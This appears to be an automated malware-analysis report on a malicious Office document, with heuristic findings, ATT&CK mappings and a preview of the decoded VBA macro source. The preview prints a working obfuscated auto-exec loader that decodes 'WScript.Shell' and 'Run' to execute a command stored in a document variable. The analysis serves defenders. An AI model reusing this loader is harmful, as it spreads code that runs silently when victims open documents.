MALICIOUS
344
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is an Office document containing obfuscated VBA macros, specifically triggering on Workbook_Open and Document_Open events. Heuristics indicate an auto-exec loader designed to execute code via CreateObject and CallByName. The ClamAV signature 'Xls.Malware.Valyria-6700361-0' further confirms its malicious nature. The VBA code appears to be heavily obfuscated, making it difficult to determine the exact payload, but the presence of auto-execution macros strongly suggests it's designed to download and run a secondary stage.
Heuristics 10
-
ClamAV: Xls.Malware.Valyria-6700361-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Malware.Valyria-6700361-0
-
VBA macros detected medium 6 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
Workbook_Open macro high OLE_VBA_WBOPENWorkbook_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
CallByName call high OLE_VBA_CALLBYNAMECallByName call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2850 bytes |
SHA-256: a12e125b90f852343f76da1ce003693ba8a82b41f101c3465ce96d594b2bf0a6 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 6 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Private Function PGLNY() As String
Dim xxxPGLNY As String
aPGLNY = "9CC3A09E9EA8A89E789E66C79E9E76B2BB709E9EAE9EAE9E9E9E9EB4B6C89E939E9E6AB586D19EA0DA9E9E9EB69EB69E8E9E607C759E9ECD9EA97EADB59EBF9E7D9E9ED49E9E8B9EB39EA59ECAC59B9E8F849EC79E7C9E9E9E"
Dim cxbPGLNY = aPGLNY
DimDimMsgBox (adc(aPGLNY & myPGLNY, 333))
End Function
Private Function PXLGH() As String
Dim xxxPXLGH As String
aPXLGH = "9CC3A09E9EA8A89E789E66C79E9E76B2BB709E9EAE9EAE9E9E9E9EB4B6C89E939E9E6AB586D19EA0DA9E9E9EB69EB69E8E9E607C759E9ECD9EA97EADB59EBF9E7D9E9ED49E9E8B9EB39EA59ECAC59B9E8F849EC79E7C9E9E9E"
Dim cxbPXLGH = aPXLGH
DimDimMsgBox (adc(aPXLGH & myPXLGH, 333))
End Function
Sub Workbook_Open()
HLYQ_
End Sub
Private Function UBQWB() As String
Dim xxxUBQWB As String
aUBQWB = "9CC3A09E9EA8A89E789E66C79E9E76B2BB709E9EAE9EAE9E9E9E9EB4B6C89E939E9E6AB586D19EA0DA9E9E9EB69EB69E8E9E607C759E9ECD9EA97EADB59EBF9E7D9E9ED49E9E8B9EB39EA59ECAC59B9E8F849EC79E7C9E9E9E"
Dim cxbUBQWB = aUBQWB
DimDimMsgBox (adc(aUBQWB & myUBQWB, 333))
End Function
Public Sub Document_Open()
Application.Run T_("777B88808E")
End Sub
Private Function NROHL() As String
Dim xxxNROHL As String
aNROHL = "9CC3A09E9EA8A89E789E66C79E9E76B2BB709E9EAE9EAE9E9E9E9EB4B6C89E939E9E6AB586D19EA0DA9E9E9EB69EB69E8E9E607C759E9ECD9EA97EADB59EBF9E7D9E9ED49E9E8B9EB39EA59ECAC59B9E8F849EC79E7C9E9E9E"
Dim cxbNROHL = aNROHL
DimDimMsgBox (adc(aNROHL & myNROHL, 333))
End Function
Sub HLYQ_()
CallByName CreateObject(T_("868292A1989FA35D8297949B9B")), T_("81A49D"), VbMethod, T_(ActiveDocument.Variables("DCIYKYX").Value), 0, True
End Sub
Private Function OINTC() As String
Dim xxxOINTC As String
aOINTC = "9CC3A09E9EA8A89E789E66C79E9E76B2BB709E9EAE9EAE9E9E9E9EB4B6C89E939E9E6AB586D19EA0DA9E9E9EB69EB69E8E9E607C759E9ECD9EA97EADB59EBF9E7D9E9ED49E9E8B9EB39EA59ECAC59B9E8F849EC79E7C9E9E9E"
Dim cxbOINTC = aOINTC
DimDimMsgBox (adc(aOINTC & myOINTC, 333))
End Function
Public Function T_(ByVal CA_ As String)
Dim FJO_ As String
Dim NEM_ As Long
For NEM_ = 1 To Len(CA_) Step 2
Dim Y_ As Long: Y_ = CLng(Chr(38) & Chr(72) & Mid(CA_, NEM_, 2))
FJO_ = FJO_ & Chr(Y_ - 47)
Next
T_ = FJO_
End Function
Private Function XMHUC() As String
Dim xxxXMHUC As String
aXMHUC = "9CC3A09E9EA8A89E789E66C79E9E76B2BB709E9EAE9EAE9E9E9E9EB4B6C89E939E9E6AB586D19EA0DA9E9E9EB69EB69E8E9E607C759E9ECD9EA97EADB59EBF9E7D9E9ED49E9E8B9EB39EA59ECAC59B9E8F849EC79E7C9E9E9E"
Dim cxbXMHUC = aXMHUC
DimDimMsgBox (adc(aXMHUC & myXMHUC, 333))
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.